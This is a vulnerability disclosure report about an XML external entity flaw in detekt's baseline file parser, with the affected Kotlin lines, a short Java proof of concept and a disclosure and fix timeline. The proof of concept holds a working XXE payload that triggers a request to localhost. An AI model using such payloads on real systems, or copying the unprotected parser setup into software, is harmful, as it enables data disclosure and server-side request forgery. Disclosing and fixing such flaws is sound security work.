Improper Restriction of XML External Entity Reference in detekt/detekt

Valid

Reported on

Jan 16th 2022


Description

The read() function makes use of SAXParser generated from a SAXParserFactory with no FEATURE_SECURE_PROCESSING set, allowing for XXE attacks. In https://github.com/detekt/detekt/blob/08eac68caa24ced140cc017d4de3b258a470232b/detekt-core/src/main/kotlin/io/gitlab/arturbosch/detekt/core/baseline/BaselineFormat.kt#L20-L22

                val reader = SAXParserFactory.newInstance().newSAXParser()
                val handler = BaselineHandler()
                reader.parse(it, handler)

Proof of Concept

Extracted out the key function mentioned above to showcase how it can be exploited.

import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;

import java.io.ByteArrayInputStream;

public class Poc {

    public static void main(String[] args) {        
        try {
            String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
            SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
            saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Causes an SSRF to http://127.0.0.1

Impact

This vulnerability is capable of XXE to disclose data/conduct SSRF attacks etc.

We are processing your report and will contact the detekt team within 24 hours. 4 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 4 months ago
Chao Zhang validated this vulnerability 4 months ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
Chao Zhang confirmed that a fix has been merged on c965a8 a month ago
The fix bounty has been dropped
BaselineFormat.kt#L20-L22 has been validated
to join this conversation